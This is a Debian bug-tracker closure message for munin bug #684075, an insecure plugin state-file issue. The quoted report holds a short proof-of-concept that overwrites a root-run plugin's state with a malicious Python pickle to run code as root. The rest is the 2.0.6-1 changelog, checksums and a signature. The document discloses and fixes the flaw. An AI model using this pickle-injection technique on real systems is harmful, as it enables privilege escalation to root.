Your message dated Mon, 03 Sep 2012 13:17:47 +0000 with message-id <e1t8wxd-0006dc...@franck.debian.org> and subject line Bug#684075: fixed in munin 2.0.6-1 has caused the Debian Bug report #684075, regarding munin: insecure state file handling, munin->root to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 684075: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=684075 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
--- Begin Message ---Package: munin-plugins-core Version: 1.4.5-3 Severity: grave Tags: upstream security X-Debbugs-CC: hel...@subdivi.de Hello, copying kenyon's report from http://www.munin-monitoring.org/ticket/1234 : Currently, plugins which run as root mix their state files in the same directory as non-root plugins. The state directory is owned by munin:munin and is group-writable. Because of these facts, it is possible for an attacker who operates as user munin to cause a root-run plugin to run arbitrary code as root. A proof-of-concept example is the smart_ plugin. It must run as root to access disk SMART data. It also stores state in Python pickle format, which can store executable Python code. Example follows: # su -s /bin/sh -c /bin/sh munin $ cd /var/lib/munin/plugin-state $ mv smart-sda.state smart-sda.state.orig $ cat bla.py import pickle import subprocess import sys class RunBinSh(object): def __reduce__(self): return (subprocess.Popen, (('/bin/sh', '-c', 'id > /tmp/whoami'),)) pickle.dump(RunBinSh(), sys.stdout) $ python bla.py > smart-sda.state # wait for node to run smart_ plugin $ cat /tmp/whoami uid=0(root) gid=110(munin) groups=0(root),110(munin) A possible solution is to have a directory dedicated to each plugin, especially plugins which may run with superuser privileges, so that less-privileged users cannot modify their state files. This cannot be enforced by munin on all plugins, but this can be enforced by munin developers for plugins shipped with the munin package. We should consider making it easy for plugin writers to do this, maybe by making the perl/bourne shell/other language munin plugin API use a dedicated plugin state directory for each plugin. Otherwise, a plugin could be hardcoded to create and use a subdirectory of the existing plugin-state directory. Thanks to "cnu" on the munin IRC channel for raising this issue and providing the smart_ example.
--- End Message ---
--- Begin Message ---Source: munin Source-Version: 2.0.6-1 We believe that the bug you reported is fixed in the latest version of munin, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 684...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Holger Levsen <hol...@debian.org> (supplier of updated munin package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Format: 1.8 Date: Mon, 03 Sep 2012 12:42:09 +0000 Source: munin Binary: munin-node munin-plugins-core munin-plugins-extra munin-plugins-java munin munin-common munin-async munin-doc Architecture: source all Version: 2.0.6-1 Distribution: unstable Urgency: high Maintainer: Munin Debian Maintainers <packag...@munin-monitoring.org> Changed-By: Holger Levsen <hol...@debian.org> Description: munin - network-wide graphing framework (grapher/gatherer) munin-async - network-wide graphing framework (async master/client) munin-common - network-wide graphing framework (common) munin-doc - network-wide graphing framework (documentation) munin-node - network-wide graphing framework (node) munin-plugins-core - network-wide graphing framework (plugins for node) munin-plugins-extra - network-wide graphing framework (user contributed plugins for nod munin-plugins-java - network-wide graphing framework (java plugins for node) Closes: 679897 684075 684076 685343 686089 686090 686093 Changes: munin (2.0.6-1) unstable; urgency=high . * New upstream release 2.0.6, switching back to cron graphing (as it better for small setups) and besides that only containing bugfixes, but many of them. See the upstream ChangeLog for the full list. - munin-node: more secure state file handling, introducing a new plugin state directory root, owned by uid 0. Then each plugin runs in its own UID plugin state directory, owned by the said UID. (Closes: #684075), (Closes: #679897), closes CVE-2012-3512. So all properly written plugins will use /var/lib/munin-node/plugin-state/$uid/$some_file now - please report plugins that are still using /var/lib/munin/plugin-state/ - as those might pose a security risk! - munin-cgi-graph: ignore @ARGV to fix CVE-2012-3513 (Closes: #684076), thanks to Helmut Grohne <hel...@subdivi.de> - munin-cron: call munin-graph with --cron argument (Closes: #685343) - Master/Node.pm: fix _node_read_fast() to accept all valid returns (Closes: #686089) and _do_connect() to not use an uninitialized variable. (Closes: #686090) - munin-async: make spoolread less restrictive about (valid) plugin names (Closes: #686093) * Update Location and Scriptalias in shipped apache.conf to fix a regression introduced in fixing #682869. * munin-node.postinst: don't create /var/lib/munin/plugin-state anymore as munin-node now uses /var/lib/munin-nodes/plugin-state and subdirs and handles creation by itself. * debian/rules: workaround bug in upstream Makefile targets to move /var/lib/async from munin-node package to munin-async. * debian/control: - make munin-async depend on munin-node for now. - update Vcs: headers to point to an uptodate repository. * Remove build/resources/apache-cgi.conf from munin.docs as it's outdated. * update munin.NEWS to reflect that everybody using cgi graphing needs to update the configuration files and that cron graphing is the default again. (cgi graphing was the default from pre-2.0 until 2.0.5) Checksums-Sha1: f74026d9184cce248e5161f2988658d05ce49e9c 2362 munin_2.0.6-1.dsc 639bd5b9fe457326842ed425f5258ea29db0b853 1325754 munin_2.0.6.orig.tar.gz 7e27351c09fbbd9d5e965a533c10764939cf3917 51051 munin_2.0.6-1.diff.gz 7fd31a561466dca631337321d05845af0f75714a 127752 munin-node_2.0.6-1_all.deb 53cb5953732a2346c295cdceca97e5edabda19ae 304194 munin-plugins-core_2.0.6-1_all.deb 2e4d133a910fa252dab2391305437b3752cc37e8 154006 munin-plugins-extra_2.0.6-1_all.deb 3eec5502fcf9e64b84c9edf98613221ff694fcd8 146912 munin-plugins-java_2.0.6-1_all.deb 23d76f087fb00cc666455a72bdf015fad9f21c74 201718 munin_2.0.6-1_all.deb 0a815552c09f7b182f3b124f6f8a465163ca5ed8 94732 munin-common_2.0.6-1_all.deb bffcde93d5c686fcf8de91581c734d32f8b09022 82804 munin-async_2.0.6-1_all.deb 3619315c94a405d54ac822262cb905bbf8b05f8c 211516 munin-doc_2.0.6-1_all.deb Checksums-Sha256: 3470e54e99e0a16e607c7f6f3812756a643008e2de91b9e2f1b695d06eab944a 2362 munin_2.0.6-1.dsc ff99a3c36156adb6b867bb684ec508a857728336c0b81a93955bbcc9d5045ea6 1325754 munin_2.0.6.orig.tar.gz 559090dec1df4d5c4d8592f630a8e827f0eacc54756aaf060ef11af4cc2c1d06 51051 munin_2.0.6-1.diff.gz fdaafe38f6e05e966063f933696e1ebf87c75caec8efeddde71630584906fca4 127752 munin-node_2.0.6-1_all.deb 7f780cdd706b61119758281031ac16d6e9a17fc153673be8b6d47857d2067605 304194 munin-plugins-core_2.0.6-1_all.deb a45aee6a32389731dcfa45cccd1926560518b02419b3c40fd9d989736fa86b5f 154006 munin-plugins-extra_2.0.6-1_all.deb b39a4c341fd99c9be476dee153e9a9110e8a4aa8ae178da5bf657ca33f9415da 146912 munin-plugins-java_2.0.6-1_all.deb ba5fe591b6a98fad66cc24ba99eba58c2b71377a2c04fbad3be7e5fd5433a583 201718 munin_2.0.6-1_all.deb fa755d6f651834adf9e91d62b960662f832b08fd44e2a1d305af694408398859 94732 munin-common_2.0.6-1_all.deb 2cb41fd22e9800e0667b2c1af516ae6e96e885cfdf28a6c3ef90cfea5c7edf3e 82804 munin-async_2.0.6-1_all.deb c7006f900b4bacff7ade589600b3ade71c4cbb4c9ed2774fe1f9189d94cf7465 211516 munin-doc_2.0.6-1_all.deb Files: 1e9514ba9330de5e78d22c474b06d0af 2362 net optional munin_2.0.6-1.dsc a64e7d3d7a7736f3959092145886ce88 1325754 net optional munin_2.0.6.orig.tar.gz 32e91dc8f2aae9ca27f4924ca1013755 51051 net optional munin_2.0.6-1.diff.gz 2bff976ceb3624407b8d8b2250a44873 127752 net optional munin-node_2.0.6-1_all.deb ed4d325236237233008ffd4e32e80a45 304194 net optional munin-plugins-core_2.0.6-1_all.deb 7d7a088725e012d8a2e89bb654e6fea8 154006 net optional munin-plugins-extra_2.0.6-1_all.deb 2c2d8496a8ecc114dfd5b6b6926c2a28 146912 net optional munin-plugins-java_2.0.6-1_all.deb 334c9918acd98ad610f2f6b9ff3d1072 201718 net optional munin_2.0.6-1_all.deb 81bfc537f8fd914a1f7cc84e1673ea50 94732 net optional munin-common_2.0.6-1_all.deb 301cd30114b0202d5af147cfc9e37148 82804 net optional munin-async_2.0.6-1_all.deb 22b455e1b14aa3d50cb9181fd0b1d9af 211516 doc optional munin-doc_2.0.6-1_all.deb -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iQIVAwUBUESqGwkauFYGmqocAQgkpQ//XIlizdF6mCQwt+a4Yv6EKSU4GZmw3Wj8 vZgXYp2Zo5r4lnsd9huSgBoUudzX+1b6NiyhKZh4cMUEIXRqD6ObbVWgFKzrXrTj 7zKh/MeFDYnhx71JPbHh+SsWfXC8aNTpU6zkE9GPgWOZP5RBYjpcyf7qQJMApclg MRUzUEaX4fcXEZMEkZI+KjuZQQej55Zwq+iRfCHYyMoslVO6eyEmiFPw33pKIf2R 8u4xseoUxmUinvD1GIEn2OfSoZiOzionEnFLXm9XSuDdDv5D3EYTF2y7XYQZu7l2 Wd48aU0KJRpNtNV2XiW/7EAXu+dE5zl5+364Qb+tYcQaaerYvF0RJWXqOLxC49w0 OZaTB9MJ4om9bCAh5jLxrejSLjVMqvCc5ntaRudqgY+dWJoDuzTs0HlwFlavq6D0 vxYw2Wvo52SxVrpWXpROHNOo0ivb1y6t4yqOC7SYpOOnLRXQ4ipK0AkSdx1z23FD FH/l8vrqOHNj78n6xiLqXm8jlufKYD8KpP9O3UkttQQ6cS2k10jFHN5PskiH32NR CH3L9S16x4nODYPO/L15Rutn/ihdeKm8nQcqTPMTKRi/3wEfi4UYDvpRM7bofs3h 5w70JYhQiRH18Jw0bhXmbK0qYo8m5S1OafYQbjO63/RcFcwBs2tzpu46ulnFczOW 0YDtt+72KHo= =PJjc -----END PGP SIGNATURE-----
--- End Message ---
